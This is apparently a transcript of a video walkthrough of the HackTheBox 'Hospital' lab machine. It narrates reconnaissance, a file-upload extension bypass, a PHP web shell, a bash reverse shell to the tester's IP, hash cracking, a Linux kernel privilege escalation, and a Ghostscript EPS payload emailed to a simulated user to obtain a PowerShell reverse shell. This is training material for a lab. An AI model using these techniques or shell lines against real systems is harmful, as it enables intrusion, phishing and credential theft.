Hello guys, this is Across Security. Today we're going to be solving one of the HTB machine, hospital. It's a Windows machine and it's also rated medium category. It involves exploiting file upload attack and Ghostscript command injection and do some Windows Privilege Escalation. So let's break in the machine together. So let's start off with running nmap, the attachment rates. Put it 10,000 for speed, all ports, and the IP address, which will be 10.10.11.241. Let's see what we have. Let's check if the IP is actually live. 10.10.11.241. Let me see, something is not right. So I probably have to spawn the machine again. Give me 1 second. It's saying the host is not reachable. Let me see if we have a VPN connection here. Yes, connected. Let's go back. Okay, so now we're getting something back. So here the TTL it's 127, suggesting we're working with Windows. If the TTL is 64, then we're working with Linux system. So let's run the script again, nmap scan, and hopefully we should get something back. And while we wait for that, another tools that I love using, it's in cursor script, and if you use the H flag for the help, and specifying the type T flag, usually I use T for all, so you can use the recon, the von check, the UDP, the script scan, and the port scan. So this is probably more of like a single pane of glass for your enumeration. It does the nmap scanning for you, the script scanning, and also do some fuzzing. If you discover 445, which is SMB, tries enumerating the SMB shares and all of those beautiful stuff for you. So let me run that, and let's leave it running. Dash T to specify all, and dash H for the host, which will be 10.10.11.241. So it's telling us that the host is likely Windows, probably because of the ping reply that we saw earlier on from the TTL. So here are the open ports. We have the DNS, we have the Cobros, we have the HTTPS, which is the secure version of HTTP, and SMB 445. So pretty much we have RDP here and Windows remote management services. So I think right now we should start with poking around with the 443. So let me close this. So HTTP 10.10.11.241. Oh, I think I put HTTP instead of HTTPS. So let me fix that. HTTPS. Okay, so we have a webmail. Let's view the source. Okay, so what we're working with, index.esps. Since we're working with Windows, let's see if, okay, robot.esp. Okay, how about PHP? Oh, interesting. So it's using the PHP. We can also use the Webalizer to check most of the metadata from the web server itself. The webmail is from Cube, and it's using the web framework Microsoft ASP.NET, and the programming language is PHP, as well as Windows Server as the operating system. So when we're customizing our payloads, or when we have the ability to throw the payload, then we should be thinking about having a payload in PHP. So let's try to log in here. Admin. What do we have? Okay, let me have something run in the background while we're poking around. For HTTP, let's see, CW, let's use the U for the URL. That will be HTTPS. Oh, my bad. That'll be 10.10.11.241, and I want to force this. And let's specify a word list. That will be user share word list. sec list and discovery, web contents, and let's do draft medium words.txt, and also let's specify the file extension to be .php. Let's also specify .txt, and let's check for any config file, conf or .config. Okay. Ooh, that's a lot of noise. Let's filter the status code. Let's filter 403, filter code 403, and let's wait and see what we have. So let's go back, try admin. Let's try admin password. Should we try admin run cube? If that doesn't work, then we're going to try some SQL injection, see if it's vulnerable to SQL injection, and if not, then we have to revisit this for 1 + 1, and let's do the same here. Okay, so that didn't work either. So let's check what else do we have. We have the SMB 445. So let me open notes. Open a new tab, and let's use enum for Linux. Let's use the enum generation, and also you can use -h to display all the flags. Usually I'm going to use the A to do all simple enumeration, including the NMB lookup. So let's do that, and put the IP address, which will be 10.10.11.241. So it's telling us that the domain name is hospital.htb. Let's go ahead and modify our host file. So we can also check for host routing. For this, let's see hosts, and that'll be 10.10.11.241, and let's paste that. Okay, so what do we have? So we don't have access to any shares. Great. So what else do we have? Okay, probably we should have another full nmap scan. Let's do and see. Let's do for script SV to enumerate version and V for port. And if we don't specify the ports, it's going to scan the top 1000. So it's pretty much looking for the same port that we saw earlier on. Okay, so let's see port 8080. Let's try to check that out. Okay, that would be HTTP. Believe HTTPS is it? Let's use hospital.htb and the port 8080. Okay, how about changing these to HTTP? Great, so we have access to another interface. Alright, so let's try default password again, admin. Just invalid username or password. How about if we put administrator? Let's see if we can get a distinct message for valid username. And once we have a valid username, we can also try a password brute force in here, but we still have to find a valid username. So let's try administrator, if I could spell correctly, and let's try the password. Okay, let's try admin 1 2 3 4 5 6. And we're in. So definitely we can report a weak password if this is a real engagement, and in a normal working environment, believe a password or a normal sane administrator should configure password with more secure characters that it's, I would say, more complex password. So now we're able to log in with a password of 1 2 3 4 5 6. So what can we do here in order to get more personalized treatment? Let's upload your medical record. So we have to upload a medical record. And now we assume that this only processes image. So let's try to upload a PNG file. And before that, let me try to intercept that. Let me clear this. All right. Let me close this one. Okay. So let's intercept the request. Let's upload. Seeds. Upload. So we go back, and now let's send this back to repeater. And so we're getting a status code 302, which is redirecting to sources.php. So this is the normal behavior if we upload a PNG file. How about if we upload, let's say if we can upload a JPEG file. So we're still able to upload a JPEG file. So let's try something else. Let's copy this. And let me open a new tab. Actually, let me send this. No. Okay. And let's specify the IP address. Oh, this will be port 80. Delete this. Yes. So okay. How about if we do PHP echo hello world, and let's try sample.php. Sample.php, and let's try to send this. So we're getting field.php. So it seems it's not allowing a PHP extension, I believe. But if we do PHP 7, still field.php. So let's do something different. So let's repeat the same for port 8080. So we're gonna leave that where it is, change this to port 8080 right here, and remove the HTTPS to be HTTP. Okay, so let's have that running. And as you can see, the script that we ran earlier on, it did the nmap full port scan, and after that it did the script scanning, and from there I believe it's going to jump to checking UDP ports, and it's still doing other enumerations or recon. So let's leave that, and pretty much we're getting the same thing here. I believe we can just clear this. So yeah, let's go ahead and clear the screen. We don't need that. So we have uploads, so we know that anything that we upload, it's going to be saved in the uploads directory. So let's try and find a way to make this work. So usually when it comes to file upload attack or any form of attack, my favorite go-to will be the hat tricks. So there are some techniques that can be used to bypass file extension blacklist. So for PHP, we could try PHP 2, PHP 3, PHP 4. Maybe the administrator just blocked PHP, PHP 2, and forgot all other extensions. We could try these extensions, and there's some instances where we could try to had special characters like the null byte, or maybe space field or new line characters to bypass any of these controls. And also we can try the camel case, which is maybe PHP using uppercase in between, trying to fool whatever rules they put in place. So let's see which one is going to work for us. So let's try PHP. Still getting field.php. And how about if we use phar, which is another extension for PHP, and if we set this, still getting filled. Okay, do we have, let's try PNG, if it's going to filled. Why are we getting filled? Let's see. Okay, so we have these, and let's change this to phar. And if we, so we have sources. Now we can try to visit this directory. Let's send this to repeater, and let's change this to get. And we know our file directory to be uploads, and the name of the file that we uploaded is sample.pr. dot phr, and let's remove this because we're not sending a post request, we're sending a get. And so we'll change the content type. Let's see if it's going to display something. Now we see that it did process the hello world right here. So awesome. So let's try to put a reverse shell here. At this point, let's try to grab. Let me turn this off. Okay. So google.com, and we can have pony shell, okay. I don't know why my system is slow. Okay, so we can just grab this PHP shell, let's do 4. Okay, so we can copy this, go back and try to re-upload the file. Let's paste it right here, and then we can rename this file and call it shell. Let's call it pshell, and if we send this, we get a success.php, and if we'll try to come here and put pshell, now we have something back. So let's go back to this, change this directory to the uploads, and call it pshell.php. No, it's not PHP, PGR. So we have the pony shell. So we can use this web shell directly from this web browser, or we can also get a stable shell on our system. So who am I? And host name. So we have the web server. So what we can do is also try to listen. Let's use this nc-lvnp 9001. Let's listen on 9001, and let's go back. Which bash? Okay, we can use bash-c, bash-i, dev tcp 10.10.14.23, and we're listening on 9001. 0 and 1. Hopefully we get a callback. Now we got a stable shell. Let's leave this running. Okay. I believe that should be okay. So let's get property ty, python3.c, import pty, pty.spawn, bin bash. Import pty.spawn. Spawn. Yes, I think I got it right now. Bin bash. Okay. There's the ty. Raw -echo, fg, and enter, and export term equals to s-term. Okay, let's clear our screen, and so we see this is the file that we uploaded, and let's go down back one directory, ls. So let's actually check the filter for the file upload. So we have to read file upload.php. So actually, let me use vim so it can color quote the syntax for us, upload.php. So this is what's going on here. Let me try to zoom it. Okay, so we see that it's checking if we upload something. It's going to get the file, which is the image that we uploaded, and if we upload a file, then it's going to check for this extension if it contains PHP, PHP 1, 2, 3, 4, 5, and PHP 6, 7, 8, and PHTML, HTML, ASPS, and ASP. So these are all the blacklisted extensions, and also we have the uploaded directory, which is the uploads, and the base name trying to string the extensions. If we have the uppercase, lowercase, it's going to like turn everything into lowercase, which is the file extension. And if this is where the condition comes in play. So if the extensions that we have, it's included in the blacklist, then it's going to redirect to this, right? But if it's not in this extension, if the extension that we used earlier on, we used the PHAR, which is not among the blacklisted extensions, then we got the file got uploaded, so it moves to the uploaded files, which of course it's right here, the directory itself. So and that's how we're able to upload the files and get a proper shell on this system. So let's let me quit. Awesome. So now let's continue with the enumeration. Let's read what's inside the config file. Okay, we have the root and the password for my SQL database. So let's put this down inside our notes. Database root, and we can use this password. So I will assume that my SQL is running on this system. ss-lntp. So we see it's running 3306. So let's try to check if we can dump some password hatches. And -u will be root, and -p the password, and then we'll paste the password. We should be able to log in. Then let's display all the databases we have. Show databases. And we're going to use diospiro, and let's display the tables, show tables, and we have the users table. So let's select everything inside the users table. And now we have two password hashes, one for admin and one for patient. The admin, I will assume that we already got the admin, which is the 123456. So let's go ahead and see if we can crack this password and see who it belongs to. Do we still need these? I don't. Let me actually kill this one. Well, let's go to this file, vi hashcrack.txt, and let's put this here. So let's we can use hashcat or John to crack the password hash, but let's use our share word list locute.txt. So it's trying to auto detect the mode. It's going to be this format, which is the bcrypt. If we check the hash, so we see that it starts with $2 $2y and $2 wildcard dollar. So we're using mode 3200. So let's have that run in the background for us. So let's continue. Let's exit. Okay, let's see pass wd, and let's grab everything that ends with sh. So we only have Dr. Williams and root. So if we're able to crack this password hash, then we could try to switch to user Dr. Williams. Hopefully that's going to be the password. But in the meantime, let's check the home directory and see if we can access that. Let's actually, do we have permission? No. ID. So we are www data, so we are not a member of this group, and as other users, we do not have either read, write, and execute permission on these. So what else? I believe it's time to dump link piece. So let's go grab one. Sweet. Link piece .sh GitHub. I always like to get the latest, so it's always been actively maintained. So okay, Sorry, I don't know why my internet is so slow. Maybe probably I have a lot of things running in the background, so it might be affecting the system a little bit. Let's go to the latest release. You see, this was updated 5 days ago, and yep. Let me try to kill some of these processes here. Let's kill this. We don't need this either, so we're done with this. Exit. And also let me kill this. So if you want to download this, also you can grab it from GitHub. I really love it too. So I think we can exit this one. Let's have a clean place. Okay, I'll grab these and go back to my terminal. Duplicate, and let's download this. Awesome. So let's start up the web server. Python 3-m http.server. Call this 9002. And now let's seed into dev shm to download this. Wget http IP address, which will be 10.10.14.23. We'll list in on 9002, and the file that we want to get is limpies.sh. Okay, so let's change the file permission. Let's give it execute permission to limpies, and run limpies.sh. Okay, so let's check if we have password recovered yet. Nope. Okay, so what else are we dealing with? Did I save any of those ports? No way. Let me see. Okay, so we can cd to 10, and let's check this out. Let me check the nmap results. Okay, so awesome. Okay, let's go back and start looking at this from the top. So what do we have? So the Nanos kernel is 5.19.0.35. So hopefully we could try to check if there's a kernel exploitation for these. What else? It says it's a virtual machine, so pretty much running has Microsoft hosts. So these I'll probably assume is using Windows subsystem for Linux, which is the WSL. If you want to check what that is, WSL Windows. Yeah, so Windows subsystem for Linux is a feature for Windows that allows developer to run a Linux environment without the need for separate virtual machine or dual booting. So we assume that's what we're dealing with here, but let's keep checking. So this is the script that we ran earlier on. This is us doing our thing. So I'm trying to look for something unusual here. Let's see. Okay, we have this checked. So Dr. Williams. So if we have to compile our own program, so we have a list of compilers, the GCC, G++. What else? Let's see. Okay. So what files? Let's see. An interesting files. Permission. I would say so far pretty much everything seems normal. Do we have anything with SGID? Any capability? No. I would say pretty much everything seems normal. Any backup files? We already checked the database, so hopefully let's see. So still checking. Okay, nothing. And this is the same password we had earlier on. So right, so let's check these for any known vulnerabilities. Exploits. Exploits. Okay, so we have game overlay vulnerability. I was reading about this one earlier on. Let's go ahead and close this out. I believe we're done with this. We could leave it. Yeah, so let's read about this. So who is vulnerable to this attack? It says Ubuntu determining affected version can be changing or such determined by the following were impacted. So let's check this. Okay, it's Ubuntu. Let's go back. Let's see. Okay. We could check if this is vulnerable to this. And what exactly is this vulnerability? So overlay FS file is allowing us in a Unix system, a system that lays one system on top of another, enabling file modification without altering the base, commonly used in scenarios like Docker container. Okay, so how does this work? Tricking the kernel to escalate your privileges with a simple executable, so non-root probable privilege executed. So we're running this using the overlay to trick the kernel into copying the executable file. Oh yeah, so let's try to see how this works. So to test our theory, we first enter a new user space. The new user space is crucial because we can only set file capability and mount the overlay file system in the namespace. Okay. So I believe we have to chain all of this together in order for us to exploit this vulnerability. So let's check this. That will be CV232060. Let's see if we have something built in GitHub. Let's check this out. So I believe we have to compile these serve. Let's see, let's look for another one. I think there's a compiler on this system itself, so we could try to compile it and then run it. But let's look for these vulnerabilities. Okay. And GitHub. Okay, let's check this out, and let's check this out. I think we previously opened this one, but we can also check it out. Let's check if we have the password retrieved yet. So okay, we see the password is still running. So okay, so tested on kernel 5.19.0 and then C.2.0. So it's still in between that. If we go here, this is 5. Let's see, 5.19.0, and it was last tested on 5.19.0 and 6.2.0. So all we just have to do is run the exploit.sh, and let's see. So what is it doing? So it's pretty much the same thing that we read earlier on. So let me copy these. and let's go back. Let's see the into temp directory, and let's call it priv via priv.sh, and let's just call it bash priv. Oh, sweet! So we are root. So who am I? We are root, and it's telling us that we can exit. We can just type exit and just let the system clean. But earlier on, we were unable to access Dr. Williams' directory. Let's see if we're able to do that now. Okay, let's see if we can get the user flag. We only have the SSH and the go. Interesting. So where's the file? User file hiding. Find type name. Let's call it user or root.txt. User.txt to devmol. Okay, how about if we check root.txt? Root.txt, nothing. So what can we do? Let's cut etc shadow. Now let's see if we can crack Dr. Williams' password. So let's use vi william.txt, and so let's use John -- word lists, user share word list william.txt. Just share word list q.txt, and then the word list itself we name it Williams, and let's see if we can crack that. Okay, let's see. Okay, so hopefully we can get something back. What else? So let's still working on this. Let's check our nmap scan and see which other port we can interact with. So it's going to be 1010, cd 10, 10, 11, 241. Oh. So what do we have? No, it's a binary. No, we're not going to do that. Let me quit and okay. Let's check the nmap directory. I just want to see what else we can work with here, since I don't recall all the ports that were scanned earlier on. So let's see. Oh, Jesus Christ. Okay. So let's check the full. Let's full. Okay. So we have port 22, 443 SMB. We have the WinRM. Okay, so just have to wait and see if we're able to get something back from here. Okay, well, let's continue poking around, and since we are root, I think we can rerun the limpies which we have in dev.shm and see if anything stands out again. Limpies. So we are already root. What else? Interesting. trying to check if anything stands out. We're still inside the container, right? Still within the virtual machine. That's correct. Do we have any cron job running? So this is actually removing everything inside the uploads directory, so it gets cleaned up. So that's about it. Pretty much we are roots already. So let's check something. How about the first webmail we have? Let's try Dr. Williams, and put in the password. Let's see if we can use this password. So this is a webmail. So if this is a webmail, then we can try to do something. Let me see, Dr. Williams, and then webmail would be webmail. This could transition to webmail. So let's try that. So webmail, we can try webmail or webmail. Let's change this down to high and see if this is going to log us in. Dr. Williams. Let's say it's failed. How about if we change this to root with the same password? It says failed. How about root with this? We could also try password brute forcing, but we might tend to lock out the account, which is not advisable in real engagement. So you want to be careful with the way you do password attack. So still waiting for this. Okay. And we're still cracking this one as well. Probably might have to pause the video and let's wait for this password to finish cracking. Okay. Let me see. So let's see if we have the password stored somewhere. Nope. Nope. Okay, so let's try something different. Let's try this password with administrator. Okay. So after a while, we're able to crack the password. So for this, I save the password here. So let's move back and let's try this password now for Dr. Williams, and let's put in the password. So it says connection failed. Let's see how we're putting in the right password. Yeah, so Dr. Williams, and the password here. I think we should. So this connection failed. Why are we getting connection failed? HTB period.htb. Dr. Williams. So probably have to. Alright, so we now successfully cracked the password. So let's try to see if we can log in with this password. And this will be for Dr. Williams. So let's put Dr. Williams, and we can put the password and try to log in. Okay. It's taking forever to log in, and now we are in. So what else? Okay, so there's a message for from Dr. Brown. It says, "Dear Lucy, I wanted to remind you that the project for lighter, cheaper, and environmentally friendly needles is still ongoing. You are the one in charge of providing me with the designs for these so that I can take them to the 3D printing department and start producing them right away. Please make the design in an EPS file format so that it can be well visualized with Ghostscript." So let's see, Ghostscript. I would say let's go to google.com and let's try Ghostscript Command Injection. Ghostscript Command Injection. Let's try this first one. So how does this work? So download this Ghostscript. The exploitation can occur upon opening a PS or EPS file and can allow code execution caused by Ghostscript mishandling permission validation for pipe devices. So all we just have to do is run the scripts, provide our EPS files, and we can inject the payload inside this EPS file for Dr. Brown to open. So let's download these. Let's copy to raw. Let's copy these and let's go back. Let me open a new terminal. Let's continue. Let's leave that to continue running, and let me clear this screen. Let's call this exploits.py. And let's put that in, and also let's go grab the EPS file that we want to inject into. So the EPS file, so we have the EPS file. Let's do the same thing and call these Acures vi Acures.eps, because that's where we want to inject into So now let's see how we can run this exploit. Python 3 exploits. What do we have? Says either the payload or reverse shell is required. So let's do dash dash. Let's go see or check how we can run this. So we can generate a new PS file, malicious PS. We're using EPS. So we can use dash dash inject, the payload that we want to inject and the file that we want to inject in. So we need to inject payload and the files. So how about if we use dash dash inject and the payload, and file name, which will be the accuracy.eps, and let's go grab shell. So let's use the reverse shell, and I'm gonna use the PowerShell because we're dealing with Windows from my understanding of enumeration that we did earlier on. And let's try some of this PowerShell. I'm not going to use this because it contains some bad characters that might break the payload. So what I'm going to try to do is use the base64 encode, which is more of like a clean payload for us. Let's see, let's leave it the way it is. Let's listen on port 9006, and let's run this. Okay. So now let's go ahead and inject that. So let me open this. This is what our EPS file looks like before we actually inject the payload. So let's open that. So this is what we have. And now after we inject the payload, we're going to see the difference in a bit. So we have the payload, and once we inject that, it says payload injected successfully. And if we cut the accuracy.eps file now, and we now have the payload injected in the EPS, so which is of course the creator, and this is the pipe, and we have the PowerShell in base64, and before that this is what we have, and now this is what we have because our payload has been injected in this EPS file, which we're going to fill to Dr. Brown. And let's wrap and nc-lvmp. Let's listen on 9006, and let's go ahead and upload the file. Let's reply to Dr. Brown. Let's compose. Okay, and we can call urgent, and please check this design, and we're gonna upload our payload here. So I'm not gonna use, let's use home, and should be inside the machines, HTB, hospital, and we have the accuracy.eps, and let's set the priority as urgent. Let's use the highest priority, and we can send the file and wait for him to click on that, and hopefully we'll get a reverse shell. So let's see if we get something. If not, then we're gonna try a different payload. Now, awesome, sweet. So we got something back, and we check who am I. We are hospital, Dr. Brown, and let's as ghostscript.bat. So I will assume this is Dr. Brown's password, and we can confirm that we saw that WinRM was open earlier on. So let's use evo WinRM. The IP address, which is 10.10.11.2, I believe 241, and let's have the username as Dr. Brown, and the password as this. Okay, sweet. So we are in. It's Dr. Brown. Let's check if we have CD to desktop. Let's okay, then what happened earlier on? Oh, I typed LSS. So now we have the user flag, so we can cut the user flag and we are in. So this is the user flag. So let's see if we can get it root. Now usually for Windows system, let's go up, inspect the web server. If we check this using the XAMPP, and usually the Windows server uses the inet pub for the default web routes. So let's check. We could also grab the WinPiece, which is the Windows version for LinPiece, and let it do its thing, and then we can analyze the result. But I'm so much curious as to what it's inside this directory, so let's go ahead and check that out. So we have the anonymous, we have the CGI bin, the htdocs, what's inside the htdoc, cd to htdocs, and ls. So we have the bin. So this looks like the directory that was first at the beginning of this video. So let's do something. How about we do echo test accuracy, and let's have that in checkme.php. If we can access that root, then let's try if we can go to checkme.php. Sweet. So now we have the tester accuracy. So let's do the same thing that we did by putting our pony shell, and hopefully we can get something different. So let's go here. Okay, so I think we can stop that, and vi shell.php, and let's put this here, and let's start a web server, Python 3 -m http.server, call it 9003 2023. Okay, so now we can wget http 10.10.14.23, and we're listening on 9003, and let's call it shell.php, and we want to output that into shell.php. So we got a callback from our web server, and now we can go back and try shell.php, shell.php. Sweet. So if we check who am I, so we are anti-authority system, so which means we have administrator privilege with the system, so we can actually grab the root flag from here, or we could also possibly get a proper reverse shell on our system, which let's try to change the port that we're listening on. Let's put this to 9004, and let's copy this. If we copy this, and let's go back, let's stop this, and let's listen on 9004 and see -lvnp 9004, and we can come here and execute this payload. We should be able to get a callback on our system, and now we do. So if we check who am I, so we are anti-authority system -all, then it's going to list all the privileges that we have. So let's go grab the root flag. So cd into the users, let's check cd to the administrator and the desktop, and here goes the root flag, so we can just cut the root flag, and that's it. Thank you all for watching. Sorry the video took quite a long time, but it's really interesting, you know, finding out how we could bypass the extension in place for the file upload, and also exploiting the kernel vulnerability using the game overlay, I would say. So it's been an interesting video. If you really do like the video, consider liking this video, and I hope I see you next time. Bye for now.